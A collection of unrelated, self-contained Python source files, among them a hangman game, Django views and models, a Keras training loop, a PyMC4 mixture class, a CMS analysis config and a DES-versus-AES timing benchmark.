self.errou_letra = []
self.acertou_letra = []
def guess(self, letter): # para a pessoa chutar uma letra
# e o computador verificar se ela já foi utilizada
if letter in self.word and letter not in self.acertou_letra:
self.acertou_letra.append(letter)
elif letter not in self.word and letter not in self.errou_letra:
self.errou_letra.append(letter)
else:
return False
return True
def forca_acabou(self):
return self.forca_ganhou() or (len(self.errou_letra)==6)
def forca_ganhou(self):
if '_' not in self.hide_word():
return True
return False
def hide_word(self):
rtn = ''
for letter in self.word:
if letter not in self.acertou_letra:
rtn = '_'
else:
rtn = letter
return rtn
def print_game_status(self):
print(board[len(self.errou_letra)])
print('\nPalavra: '+self.hide_word())
print('\nLetras erradas: ')
for letter in self.errou_letra:
print(letter,' ', end='')
print('Letras corretas:')
for letter in self.acertou_letra:
prit(letter,' ', end='')
def rand_word():
with open('palavras.txt', 'rt') as f:
bank = f.readlines()
return bank[random.randint(0,len(bank))].strip()
def main():
game = Hangman(rand_word())
while not game.forca_acabou():
game.print_game_status()
user_input = input('\nDigite uma letra: ')
game.guess(user_input)
game.print_game_status()
if game.forca_ganhou():
print('Congrats you won!')
else:
print('Perdeu')
print('A palavrra era:' + game.word)
if __name__ == '__main__':
main() |
base = [3,7,20,2,11,19,96,35,15,64]
mark = False
false_index = -1
loop = True
Guess = int(input("Enter a number : "))
for i in range(len(base)):
if Guess == base[i]:
false_index = i+1;
mark=True
break
if not mark:
print("Not found")
else:
print("Found {0} at index {1}".format(Guess,false_index))
|
"""
Copyright (c) 2020 R. Ian Etheredge All rights reserved.
This work is licensed under the terms of the MIT license.
For a copy, see <https://opensource.org/licenses/MIT>.
"""
from VisionEngine.base.base_trainer import BaseTrain
import tensorflow as tf
import numpy as np
import os
class KLWarmUp(tf.keras.callbacks.Callback):
def __init__(
self, n_iter=100, start=0.0, stop=1.0, n_cycle=4, ratio=0.5, n_latents=4
):
self.frange = self.frange_cycle_linear(
n_iter, start=start, stop=stop, n_cycle=n_cycle, ratio=ratio
)
self.epoch = 0
self.n_latents = n_latents
def on_epoch_end(self, *args, **kwargs):
new_coef = self.frange[self.epoch]
self.epoch += 1
coefs = [
self.model.get_layer(f"z_{i+1}").coef_kl for i in range(self.n_latents)
]
for coef in coefs:
coef.assign(new_coef)
@staticmethod
def frange_cycle_linear(n_iter, start=0.0, stop=1.0, n_cycle=4, ratio=0.5):
L = np.ones(n_iter) * stop
period = n_iter / n_cycle
step = (stop - start) / (period * ratio) # linear schedule
for c in range(n_cycle):
v, i = start, 0
while v <= stop and (int(i + c * period) < n_iter):
L[int(i + c * period)] = v
v += step
i += 1
return L
class Trainer(BaseTrain):
def __init__(self, model, data, config):
super(Trainer, self).__init__(model, data, config)
self.callbacks = []
self.loss = []
self.init_callbacks()
def init_callbacks(self):
self.callbacks.append(
tf.keras.callbacks.ModelCheckpoint(
filepath=os.path.join(
os.getenv("VISIONENGINE_HOME"),
self.config.callbacks.checkpoint_dir,
"{}.hdf5".format(self.config.exp.name),
),
monitor=self.config.callbacks.checkpoint_monitor,
mode=self.config.callbacks.checkpoint_mode,
save_best_only=self.config.callbacks.checkpoint_save_best_only,
save_weights_only=self.config.callbacks.checkpoint_save_weights_only,
verbose=self.config.callbacks.checkpoint_verbose,
save_freq=self.config.callbacks.save_freq,
)
)
self.callbacks.append(
tf.keras.callbacks.TensorBoard(
log_dir=os.path.join(
os.getenv("VISIONENGINE_HOME"),
self.config.callbacks.tensorboard_log_dir,
),
write_graph=self.config.callbacks.tensorboard_write_graph,
write_images=self.config.callbacks.tensorboard_write_images,
histogram_freq=self.config.callbacks.tensorboard_histogram_freq,
)
)
if self.config.trainer.use_lr_scheduler is True:
lr_epochs = 10 ** np.linspace(
self.config.trainer.lr_start,
self.config.trainer.lr_stop,
self.config.trainer.num_epochs,
)
self.callbacks.append(
tf.keras.callbacks.LearningRateScheduler(lambda i: lr_epochs[i])
)
if self.config.trainer.use_early_stopping is True:
self.callbacks.append(
tf.keras.callbacks.EarlyStopping(
min_delta=self.config.trainer.min_delta,
patience=self.config.trainer.patience,
monitor=self.config.trainer.early_stopping_monitor,
)
)
if self.config.trainer.use_kl_warmup is True:
self.callbacks.append(
KLWarmUp(
n_iter=self.config.trainer.kl_wu_n_iter,
start=self.config.trainer.kl_wu_start,
stop=self.config.trainer.kl_wu_stop,
n_cycle=self.config.trainer.kl_wu_n_cycle,
ratio=self.config.trainer.kl_wu_ratio,
n_latents=self.config.model.n_latents,
)
)
def train(self):
self.model.fit(
self.data[0],
epochs=self.config.trainer.num_epochs,
callbacks=self.callbacks,
validation_data=self.data[1],
steps_per_epoch=int(
(1 - self.config.data_loader.validation_split)
* self.config.data_loader.n_samples
/ self.config.trainer.batch_size
+ 1
),
validation_steps=int(
self.config.data_loader.validation_split
* self.config.data_loader.n_samples
/ self.config.trainer.batch_size
+ 1
),
use_multiprocessing=True,
)
# we save the best model during training, don't need this
# self.model.save_weights(
# os.path.join(os.getenv("VISIONENGINE_HOME"),
# self.config.callbacks.checkpoint_dir,
# '%s-{epoch:02d}-{loss:.2f}.hdf50' % self.config.exp.name)
# )
|
from .random_variable import RandomVariable, TensorLike
from tensorflow_probability import distributions as tfd
import pymc4 as pm
from typing import List
class Mixture(RandomVariable):
r"""
Mixture random variable.
Often used to model subpopulation heterogeneity
.. math:: f(x \mid w, \theta) = \sum_{i = 1}^n w_i f_i(x \mid \theta_i)
======== ============================================
Support :math:`\cap_{i = 1}^n \textrm{support}(f_i)`
Mean :math:`\sum_{i = 1}^n w_i \mu_i`
======== ============================================
Parameters
----------
p : array of floats
p >= 0 and p <= 1
the mixture weights, in the form of probabilities
distributions : multidimensional PyMC4 distribution (e.g. `pm.Poisson(...)`)
or iterable of one-dimensional PyMC4 distributions the
component distributions :math:`f_1, \ldots, f_n`
Developer Notes
---------------
Mixture models must implement _base_dist (just as any other RV), but
we must explicitly return the self._distribution object when implementing
a new mixture distribution. This ensures that log_prob() calculations work correctly.
For an example, see below an example taken from the last line of _base_dist in the
ZeroInflatedPoisson distribution implementation (in discrete.py).
.. code::
def _base_dist(self, psi, theta, *args, **kwargs):
return pm.Mixture(
p=[psi, 1.0 - psi],
distributions=[
pm.Constant(name="Zero", value=0),
pm.Poisson(name="Poisson", mu=theta)
],
name="ZeroInflatedPoisson",
)._distribution # <---- this is key!
Compared to PyMC3's API, the Mixture API is slightly changed to make things
smoother for end-users.
Firstly, end-users may find it to be extra work to specify that they want the
distribution objects for each RV. Hence, the Mixture RV will automatically
grab out the ._distribution object for each RV object passed in. Hence, users
need only specify the PyMC4 RV object.
This first point also makes things hopefully maps better to how end-users abstract
and think about distributions. Our average user probably doesn't distinguish
very clearly between an RV and a distribution object, though we know to do so.
Otherwise, we would not have had questions that Junpeng had to answer on discourse
regarding how to create mixture distributions in which end-users simply forgot to
add ``.distribution`` at the end of their distribution calls.
Secondly, we use the "p" and "distributions", rather than the old "w" and "comp_dists"
kwargs. During the PyMC4 API development, this is probably the only place where I
(Eric Ma) have chosen to deviate from the old API, hopefully as an improvement for
newcomers' mental model of the API.
"""
def _base_dist(self, p: TensorLike, distributions: List[RandomVariable], *args, **kwargs):
return tfd.Mixture(
cat=pm.Categorical(p=p, name="MixtureCategories")._distribution,
components=[d._distribution for d in distributions],
name=kwargs.get("name"),
)
|
from django.shortcuts import render,redirect
from .models import Products,Category,Tags
from django.http import HttpResponse
from .forms import ProductForm
# Create your views here.
def home(request):
products=Products.objects.all()
#tags=products.pop('tags')
return render(request,'home.html',{'products':products,})
def add(request):
add=ProductForm()
if request.method=='POST':
add=ProductForm(request.POST,request.FILES)
if add.is_valid():
add.save()
return redirect('home')
else:
return render(request, 'upload_form.html', {'upload_form':add})
def update_prod(request,prod_id):
prod_id=int(prod_id)
try:
product=Products.objects.get(id=prod_id)
except Products.DoesNotExist:
return redirect('home')
prod_edit=ProductForm(request.POST or None,instance=product)
if prod_edit.is_valid():
prod_edit.save()
return redirect('home')
return render(request, 'upload_form.html', {'upload_form':prod_edit})
def delete_prod(request,prod_id):
prod_id=int(prod_id)
try:
product=Products.objects.get(id=prod_id)
except Products.DoesNotExist:
return redirect('home')
product.delete()
return redirect('home')
from django.contrib.auth import login, authenticate
from django.contrib.auth.forms import UserCreationForm
def register(request):
if request.method == 'POST':
# Assigning the User Creation form with the Post request object to form variable
form = UserCreationForm(request.POST)
if form.is_valid():
# Save the user
form.save()
# Getting the values from the form
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('password1')
# Authenticate user using the authenticate method
user = authenticate(username=username, password=raw_password)
# After Successfully Authenticated then use login function to login the user
login(request, user)
return redirect('/')
else:
form = UserCreationForm()
return render(request, 'signup.html', {'form': form})
|
from textblob import TextBlob
from plotly.offline import plot
import plotly.graph_objs as go
import random
user1 = "Bob"
user2 = 'Alice'
with open('chat_sample.txt', 'r+') as f:
samples = f.readlines()
d = {user1:[], user2:[]}
for line in samples:
time, *text = line.split('-')
text = ''.join(text)
name, *chat = text.split(':')
t = TextBlob(''.join(chat))
name = name.strip()
if name == user1 or name == user2:
d[name].append(t.sentiment.polarity)
trace1 = go.Scatter(
y = d[user1][:9000],
name = user1,
mode = 'markers',
marker=dict(
size='8',
colorscale='Picnic',
color = random.sample(range(9000),9000),
)
)
trace2 = go.Scatter(
y = d[user2],
name = user2,
mode = 'markers',
marker=dict(
size='7',
color = random.sample(range(8000), 8000),
colorscale='Electric',
)
)
data = [trace1, trace2]
plot(data) |
# -*- coding: utf-8 -*-
import pandas as pd
## create empty df
df = pd.DataFrame()
# create a column
df['name'] = ['Adam', 'Xavier', 'Ada']
df['employed'] = ['Yes', 'Yes', 'No']
df['age'] = [32,32,21]
## create a function
def mean_age_by_group(dataframe,col):
#groups the data by a column and return mean age per group
return dataframe.groupby(col).mean()
## create a function
def uppercase_column_name(dataframe):
# cap all the column headers
dataframe.columns = dataframe.columns.str.upper()
# return dataframe
return dataframe
# create a pipeline that applies botg functions
(df.pipe(mean_age_by_group,col='employed')
# then apply uppercase function
.pipe(uppercase_column_name))
|
import sqlite3
import pandas as pd
conn = sqlite3.connect('tweets.db')
c = conn.cursor()
c.execute('''
SELECT * FROM normal_tweets
''')
rows = c.fetchall()
df = pd.DataFrame(rows, columns=['id', 'datetime', 'tweet'])
sample = df.sample(len(df))
sample['tweet'].to_csv('data_labeling/FULL_label_data.txt') |
import FWCore.ParameterSet.Config as cms
process = cms.Process("Demo")
process.Timing = cms.Service("Timing")
process.ana_PbPb = cms.EDAnalyzer('singleTrackAnalyzer',
vertexSrc = cms.string('hiSelectedVertex'),
trackSrc = cms.InputTag('hiGeneralTracks'),
pfCandSrc = cms.untracked.InputTag('particleFlowTmp'),
doCaloMatched = cms.untracked.bool(True),
reso = cms.untracked.double(0.5),#0.2
offlineDCA = cms.untracked.double(3.0),#3.0
offlineChi2 = cms.untracked.double(0.15),#0.15
offlineptErr = cms.untracked.double(0.1),#0.05
offlinenhits = cms.untracked.double(11)#10
)
### standard includes
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContentHeavyIons_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_38T_PostLS1_cff')
process.load('Configuration.StandardSequences.RawToDigi_cff')
process.load('Configuration.StandardSequences.L1Reco_cff')
process.load('Configuration.StandardSequences.ReconstructionHeavyIons_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
#process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
### conditions
#from Configuration.AlCa.GlobalTag import GlobalTag
#process.GlobalTag = GlobalTag(process.GlobalTag, '75X_mcRun2_HeavyIon_v1','')
process.options = cms.untracked.PSet( wantSummary =
cms.untracked.bool(True) )
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32( -1 ) )
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
#'root://xrootd3.cmsaf.mit.edu//store/user/qwang/HIHardProbes/HIHardProbes_FullTrackSkim2015_v3/151216_192437/0000/FullTrack_1.root'
#'root://xrootd3.cmsaf.mit.edu//store/user/qwang/HIHardProbes/HIHardProbes_FullTrackSkim2015_v3/151216_192437/0000/FullTrack_10.root'
'/store/user/qwang/HIHardProbes/HIHardProbes_FullTrackSkim2015_v3/151216_192437/0000/FullTrack_100.root'
))
import HLTrigger.HLTfilters.hltHighLevel_cfi
process.hltHM = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone(
TriggerResultsTag = cms.InputTag("TriggerResults","","HLT")
)
process.hltMB = process.hltHM.clone()
process.hltMB.HLTPaths = ['HLT_HIL1MinimumBiasHF1AND_v1']
process.hltMB.andOr = cms.bool(True)#Flase OR
process.hltMB.throw = cms.bool(False)
process.hltHM1 = process.hltHM.clone()
process.hltHM2 = process.hltHM.clone()
process.hltHM3 = process.hltHM.clone()
process.hltHM4 = process.hltHM.clone()
process.hltHM5 = process.hltHM.clone()
##### PbPb HLTSingleTrack ######
process.hltHM1.HLTPaths = ['HLT_HIFullTrack12_L1MinimumBiasHF1_AND_v1']
process.hltHM2.HLTPaths = ['HLT_HIFullTrack18_L1MinimumBiasHF1_AND_v1']
process.hltHM3.HLTPaths = ['HLT_HIFullTrack24_v1']
process.hltHM4.HLTPaths = ['HLT_HIFullTrack34_v1']
process.hltHM5.HLTPaths = ['HLT_HIFullTrack45_v1']
process.hltHM1.andOr = cms.bool(True)
process.hltHM1.throw = cms.bool(False)
process.hltHM2.andOr = cms.bool(True)
process.hltHM2.throw = cms.bool(False)
process.hltHM3.andOr = cms.bool(True)
process.hltHM3.throw = cms.bool(False)
process.hltHM4.andOr = cms.bool(True)
process.hltHM4.throw = cms.bool(False)
process.hltHM5.andOr = cms.bool(True)
process.hltHM5.throw = cms.bool(False)
process.ana_PbPb0 = process.ana_PbPb.clone()
process.ana_PbPb1 = process.ana_PbPb.clone()
process.ana_PbPb2 = process.ana_PbPb.clone()
process.ana_PbPb3 = process.ana_PbPb.clone()
process.ana_PbPb4 = process.ana_PbPb.clone()
process.ana_PbPb5 = process.ana_PbPb.clone()
process.ana_PbPb6 = process.ana_PbPb.clone()
process.ana_PbPb7 = process.ana_PbPb.clone()
process.ana_PbPb8 = process.ana_PbPb.clone()
process.ana_PbPb9 = process.ana_PbPb.clone()
process.d0 = cms.Path( process.hltMB*process.ana_PbPb0 )
process.d1 = cms.Path( process.hltHM1*process.ana_PbPb1 )
process.d2 = cms.Path( process.hltHM2*process.ana_PbPb2 )
process.d3 = cms.Path( process.hltHM3*process.ana_PbPb3 )
process.d4 = cms.Path( process.hltHM4*process.ana_PbPb4 )
process.p0 = cms.Path( process.hltMB*process.hltHM1*process.ana_PbPb5 )
process.p1 = cms.Path( process.hltHM1*process.hltHM2*process.ana_PbPb6 )
process.p2 = cms.Path( process.hltHM2*process.hltHM3*process.ana_PbPb7 )
process.p3 = cms.Path( process.hltHM3*process.hltHM4*process.ana_PbPb8 )
process.p4 = cms.Path( process.hltHM4*process.hltHM5*process.ana_PbPb9 )
process.schedule = cms.Schedule(process.d0,process.d1,process.d2,process.d3,process.d4,process.p0,process.p1,process.p2,process.p3,process.p4)
process.TFileService = cms.Service("TFileService",fileName = cms.string("singletrack.root"))
|
import sys
import numpy as np
seed = 1
np.random.seed(seed)
#pfam_id = 'PF00008'
#ipdb = 0
pfam_id = sys.argv[1]
ipdb = sys.argv[2]
ipdb = int(ipdb)
ext_name = '%s/%02d'%(pfam_id,ipdb)
try:
ct = np.loadtxt('%s_ct.dat'%ext_name)
except:
pass
#=========================================================================================
thresholds = [2.,4.,6.,8.,10]
for threshold in thresholds:
ct1 = ct.copy()
np.fill_diagonal(ct1, 1000)
# fill the top smallest to be 1, other 0
top_pos = ct1 <= threshold
#print(top_pos)
ct1[top_pos] = 1.
ct1[~top_pos] = 0.
#print(ct1)
xy = np.argwhere(ct1==1)
#print(xy)
np.savetxt('%s_contact_%02d.dat'%(ext_name,threshold),xy,fmt='% i')
|
# Generated by Django 3.1.5 on 2021-01-29 17:05
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('films', '0006_film_creator'),
]
operations = [
migrations.AlterField(
model_name='film',
name='creator',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='posted_films', to=settings.AUTH_USER_MODEL),
),
]
|
class Node:
def __init__(self, id: int, tag: bool = False, weight: int = 0.0, color: str = "white",
nodesIn: dict = None, nodesOut: dict = None, position: tuple = None, parent=None):
self.id = id
self.tag = tag
self.weight = weight
self.color = color
if nodesIn is None:
self.nodesIn = {}
else:
self.nodesIn = nodesIn # (key = int , value = weight)
if nodesOut is None:
self.nodesOut = {}
else:
self.nodesOut = nodesOut # (key = int , value = weight)
self.position = position
self.parent = parent
def getKey(self) -> int:
return self.id
def getTag(self) -> bool:
return self.tag
def setTag(self, tag):
self.tag = tag
def getPos(self) -> tuple:
return self.position
def setPos(self, p):
self.position = p
def getColor(self) -> str:
return self.color
def setColor(self, c):
self.color = c
def getWeight(self) -> float:
return self.weight
def setWeight(self, w):
self.weight = w
def repr_json(self):
return self.__dict__
def getParent(self):
return self.parent
def setParent(self, p):
self.parent = p
def __repr__(self):
return str(self.__dict__)
def __eq__(self, other) -> bool:
return self.id == other.id and self.position == other.position
def __lt__(self, other):
p = (self.weight, self.id)
h = (other.getWeight(), other.getKey())
return p < h
|
#!/usr/bin/python
""" This program will search "pycon" keyword on provided site and validate test as per search result. """
import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class pythonorgserach(unittest.TestCase):
def setUp(self):
"""set geckodriver bin file path """
self.driver = webdriver.Firefox(executable_path = "/home/devi/web/geckodriver")
def test_search_in_python_org(self):
driver = self.driver
driver.get("https://www.python.org/")
self.assertIn("Python", driver.title)
ele = driver.find_element_by_name("q")
ele.send_keys("pycon")
ele.send_keys(Keys.RETURN)
assert "No results found" not in driver.page_source
def tearDown(self):
self.driver.quit()
if __name__ == "__main__":
unittest.main()
|
import tensorflow as tf
x1 = tf.add(4,8,)
x2 = tf.multiply(x1,5)
x3 = tf.add(12,6,)
x4 = tf.multiply(x3,x2)
x5 = tf.div(x4,2)
with tf.Session() as sess:
output = sess.run(x5)
print(output)
with tf.Session() as sess:
outnew=tf.summary.FileWriter("./logs/add",sess.graph) #tensorboard --logdir=logs
print(sess.run(x5))
outnew.close()
|
from unittest import TestCase
from django.conf import settings
from django_dynamic_fixture import decorators
class SkipForDatabaseTest(TestCase):
def setUp(self):
self.it_was_executed = False
def tearDown(self):
# It is important to do not break others tests: global and shared variable
decorators.DATABASE_ENGINE = settings.DATABASES['default']['ENGINE']
@decorators.only_for_database(decorators.POSTGRES)
def method_postgres(self):
self.it_was_executed = True
def test_annotated_method_only_for_postgres(self):
decorators.DATABASE_ENGINE = decorators.SQLITE3
self.method_postgres()
assert self.it_was_executed is False
decorators.DATABASE_ENGINE = decorators.POSTGRES
self.method_postgres()
assert self.it_was_executed
class OnlyForDatabaseTest(TestCase):
def setUp(self):
self.it_was_executed = False
def tearDown(self):
# It is important to do not break others tests: global and shared variable
decorators.DATABASE_ENGINE = settings.DATABASES['default']['ENGINE']
@decorators.skip_for_database(decorators.SQLITE3)
def method_sqlite3(self):
self.it_was_executed = True
def test_annotated_method_skip_for_sqlite3(self):
decorators.DATABASE_ENGINE = decorators.SQLITE3
self.method_sqlite3()
assert self.it_was_executed is False
decorators.DATABASE_ENGINE = decorators.POSTGRES
self.method_sqlite3()
assert self.it_was_executed
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#****************************************************************#
# ScriptName: test.py
# Author:
# Create Date: 2014-03-07
# Modify Author:
# Modify Date: 2014-03-07
# Function:
#***************************************************************#
import execs
import random
def conf_grid():
cmd=["export ORACLE_BASE=/opt/ogrid","export ORACLE_HOME=/opt/grid/products/11.2.0","export PATH=$PATH:$ORACLE_HOME/bin","export ORACLE_SID=+ASM1","export PATH=$PATH:$ORACLE_HOME/bin","umask 022"]
f=open('/home/grid/.bash_profile','a');
for i in range(0,len(cmd)):
f.write(cmd[i]+"\n")
f.close()
(stdout,stderr)=execs.call("source /home/grid/.bash_profile")
(stdout,stderr)=execs.call("chown -R grid:oinstall /home/grid")
print "grid profile is config \033[1;32;40m ok\033[0m "
if __name__ == "__main__":
conf_grid()
|
from .auth import require
from .common import CommonController
import cherrypy
import simplejson
class Table(CommonController):
_cp_config = {
'tools.sessions.on': True,
'tools.auth.on': True
}
@cherrypy.expose
@require()
def list(self):
table=self.model.get_list()
data=dict(module_template='table.jinja', table=table)
return self.render(data)
@cherrypy.expose
@require()
def edit(self, value):
content=self.model.get_item(value)
str_content = simplejson.dumps(content, indent="\t")
data=dict(module_template='detail.jinja', key=value, value=str_content)
return self.render(data)
@cherrypy.expose
@require()
def save(self, key, value, control):
if control == "store":
content = simplejson.loads(value)
self.model.set_item(key, content)
raise cherrypy.HTTPRedirect("/table/list")
@cherrypy.expose
@require()
def remove(self, value):
self.model.remove_item(value)
raise cherrypy.HTTPRedirect("/table/list")
@cherrypy.expose
def __call__(self):
data=dict(module_template='table.jinja')
return self.render(data)
def __init__(self, model):
self.model = model
super(Table, self).__init__()
|
"""
This script is used to test the performance between DES and AES.
The requirement library includes numpy, pycrypto, and matplotlib
"""
import os
import time
import numpy as np
import matplotlib.pyplot as plt
from Crypto.Cipher import AES
from Crypto.Cipher import DES
from des_algorithm import * # import my des algorithm library
__author__ = "Liu Dairui"
def encryption(text, algorithm, mode):
start_time = time.time()
if algorithm == "DES":
if mode == "ECB":
# DES ECB mode encrypt data
k = DES.new(des_key, DES.MODE_ECB)
value = k.encrypt(pad_text(str2ascii(text)))
else:
# DES CBC mode encrypt data
k = DES.new(des_key, DES.MODE_CBC, IV=IV)
value = k.encrypt(pad_text(str2ascii(text)))
else:
if mode == "ECB":
# AES ECB mode encrypt data
k = AES.new(aes_key, AES.MODE_ECB)
value = k.encrypt(pad_text_aes(str2ascii(text)))
else:
# AES CBC mode encrypt data
k = AES.new(aes_key, AES.MODE_CBC, "This is an IV456")
value = k.encrypt(pad_text_aes(str2ascii(text)))
return value, time.time() - start_time
def decryption(text, algorithm, mode):
# decrypt data using corresponding algorithm and mode
start_time = time.time()
if algorithm == "DES":
if mode == "ECB":
k = DES.new(des_key, DES.MODE_ECB)
k.decrypt(text)
else:
k = DES.new(des_key, DES.MODE_CBC, IV=IV)
k.decrypt(text)
else:
if mode == "ECB":
k = AES.new(aes_key, AES.MODE_ECB)
k.decrypt(text)
else:
k = AES.new(aes_key, AES.MODE_CBC, "This is an IV456")
k.decrypt(text)
return time.time() - start_time
def pad_text_aes(text):
pad_len = 16 - (len(text) % 16)
return text + bytes([pad_len]) * pad_len
def start(r, algorithm, mode):
# calculate encryption and decryption time
times_en, times_de = [], []
for size in range(1, r, step):
time_en, time_de = [], []
# calculate 10 times and average the result
for _ in range(10):
data = generate_data(size)
text, tmp = encryption(data, algorithm, mode)
time_en.append(tmp)
tmp = decryption(text, algorithm, mode)
time_de.append(tmp)
del data
times_en.append(np.mean(time_en))
times_de.append(np.mean(time_de))
print("{} with {} deal with {}MB data cost: {}s.".format(algorithm, mode, size, times_en[-1] + times_de[-1]))
print("{} with {} finished.".format(algorithm, mode))
return times_en, times_de
def generate_data(size):
return os.urandom(1024 * 1024 * size).hex()
if __name__ == "__main__":
# the default algorithm and mode chosen here
algorithms = ["DES", "AES"]
modes = ["ECB", "CBC"]
aes_key = "Sixteen byte key"
des_key = "00000000"
IV = "00000000"
rounds, step = 102, 16
fig_en = plt.figure()
fig_de = plt.figure()
ax_en = fig_en.add_subplot(111)
ax_de = fig_de.add_subplot(111)
for a in algorithms:
for m in modes:
t_e, t_d = start(rounds, a, m)
ax_en.plot(range(1, rounds, step), t_e, marker='o', linestyle="--", linewidth=0.5,
label="{}+{}".format(a, m))
ax_de.plot(range(1, rounds, step), t_d, marker='o', linestyle="--", linewidth=0.5,
label="{}+{}".format(a, m))
del t_e, t_d
ax_en.legend()
ax_de.legend()
plt.sca(ax_en)
plt.title("Performance comparison between DES and AES: Encryption")
plt.xlabel("Data Block size(MB)")
plt.ylabel("Time(s)")
plt.sca(ax_de)
plt.title("Performance comparison between DES and AES: Decryption")
plt.xlabel("Data Block size(MB)")
plt.ylabel("Time(s)")
fig_en.savefig("DESvsAES_encryption.png")
fig_de.savefig("DESvsAES_decryption.png")
plt.show()
|
from django.db import models
from accounts.models import User
from cmdb.models.base import IDC
from cmdb.models.asset import Server, NetDevice
class CPU(models.Model):
# Intel(R) Xeon(R) Gold 5118 CPU @ 2.30GHz
version = models.CharField('型号版本', max_length=100, unique=True)
speed = models.PositiveSmallIntegerField('频率MHz')
process = models.PositiveSmallIntegerField('线程数')
created_date = models.DateTimeField('创建时间', auto_now_add=True)
class Meta:
db_table = 'cmdb_acc_cpu'
verbose_name = u'配件CPU表'
verbose_name_plural = u'配件CPU表'
class Memory(models.Model):
ram_type = models.CharField('内存类型', max_length=4, choices=(('ddr3', 'DDR3'), ('ddr4', 'DDR4'), ('ddr5', 'DDR5')))
ram_size = models.PositiveSmallIntegerField('内存容量(G)')
speed = models.PositiveSmallIntegerField('速率(MT/s)')
created_date = models.DateTimeField('创建时间', auto_now_add=True)
class Meta:
db_table = 'cmdb_acc_memory'
unique_together = ('ram_type', 'ram_size', 'speed')
verbose_name = u'配件内存表'
verbose_name_plural = u'配件内存表'
class Disk(models.Model):
device_type = models.CharField('硬盘类型', max_length=4, choices=(('sata', 'SATA'), ('sas', 'SAS'), ('ssd', 'SSD')))
capacity = models.PositiveSmallIntegerField('容量(G)')
rpm = models.PositiveSmallIntegerField('转率')
dimensions = models.CharField('尺寸(英寸)', max_length=3, choices=(('2.5', '2.5寸'), ('3.5', '3.5寸')))
created_date = models.DateTimeField('创建时间', auto_now_add=True)
class Meta:
db_table = 'cmdb_acc_disk'
unique_together = ('device_type', 'capacity', 'rpm', 'dimensions')
verbose_name = u'配件硬盘表'
verbose_name_plural = u'配件硬盘表'
class Caddy(models.Model):
caddy_dimensions = {
'2.5s': '2.5寸 R740', '2.5': '2.5寸', '3.5': '3.5寸'
}
dimensions = models.CharField('尺寸(英寸)', max_length=4, choices=caddy_dimensions.items(), unique=True)
created_date = models.DateTimeField('创建时间', auto_now_add=True)
class Meta:
db_table = 'cmdb_acc_caddy'
verbose_name = u'配件硬盘托架表'
verbose_name_plural = u'配件硬盘托架表'
class NetworkAdapter(models.Model):
speed = models.CharField('网卡速率', max_length=6, choices=(('100MbE', '百兆'), ('GbE', '千兆'), ('10GbE', '万兆')), unique=True)
created_date = models.DateTimeField('创建时间', auto_now_add=True)
class Meta:
db_table = 'cmdb_acc_network_adapter'
verbose_name = u'配件网卡表'
verbose_name_plural = u'配件网卡表'
class NetworkCable(models.Model):
cat = models.CharField('网线类型', max_length=2, choices=(('5', '5类线'), ('5e', '超5类线'), ('6', '6类线'), ('6e', '超6类线')))
length = models.PositiveSmallIntegerField('长度(米)')
created_date = models.DateTimeField('创建时间', auto_now_add=True)
class Meta:
db_table = 'cmdb_acc_network_cable'
unique_together = ('cat', 'length')
verbose_name = u'配件网线表'
verbose_name_plural = u'配件网线表'
class OpticalTransceiver(models.Model):
# Small form-factor pluggable transceiver 小型可插拔光模块
"""
Mfg. Compatibility: Cisco
Part Number: SFP-10G-LR-10pk
Form Factor: SFP+
TX Wavelength: 1310nm
Reach: 10km
Cable Type: SMF
Rate Category: 10GBase
Interface Type: LR
DDM: Yes
Connector Type: Dual-LC
"""
information = models.CharField('综述介绍', max_length=20, blank=True, null=True)
mode = models.CharField('模式', max_length=6, choices=(('single', '单模'), ('multi', '多模')))
reach = models.FloatField('最大传输距离(km)')
rate = models.CharField('传输速率', max_length=6, choices=(('100MbE', '百兆'), ('GbE', '千兆'), ('10GbE', '万兆')))
image = models.ImageField(u'图片', upload_to='images/accessory/%Y%m%d', null=True, blank=True)
created_date = models.DateTimeField('创建时间', auto_now_add=True)
class Meta:
db_table = 'cmdb_acc_optical_transceiver'
unique_together = ('mode', 'reach', 'rate')
verbose_name = u'配件光模块表'
verbose_name_plural = u'配件光模块表'
class JumpWire(models.Model):
information = models.CharField('综述介绍', max_length=20, blank=True, null=True)
mode = models.CharField('模式', max_length=6, choices=(('single', '单模'), ('multi', '多模')))
interface = models.CharField('光纤接口', max_length=6, choices=(('lc', '小方头'), ('sc', '大方头'), ('fc', '圆头')))
length = models.PositiveSmallIntegerField('长度(米)')
image = models.ImageField(u'图片', upload_to='images/accessory/%Y%m%d', null=True, blank=True)
created_date = models.DateTimeField('创建时间', auto_now_add=True)
class Meta:
db_table = 'cmdb_acc_jump_wire'
unique_together = ('mode', 'interface', 'length')
verbose_name = u'配件跳线表'
verbose_name_plural = u'配件跳线表'
accessory_item = {
'cpu': 'CPU', 'memory': '内存', 'disk': '硬盘', 'caddy': '硬盘托架', 'network_adapter': '网卡', 'network_cable': '网线',
'transceiver': '光模块', 'jump_wire': '跳线'
}
class Accessory(models.Model):
storehouse = models.ForeignKey(IDC, on_delete=models.CASCADE, help_text='仓库')
mode = models.CharField('配件类型', max_length=20, choices=accessory_item.items())
mode_id = models.IntegerField('配件型号表主键ID')
manufacturer = models.CharField('硬件制造商', max_length=20, blank=True, null=True)
sn = models.CharField('Serial Number', max_length=50, blank=True, null=True)
vendor = models.CharField('采购渠道(供应商)', max_length=20)
trade_date = models.DateField('采购时间', blank=True, null=True)
expired_date = models.DateField('过保时间', blank=True, null=True)
comment = models.CharField('备注', max_length=50, blank=True, null=True)
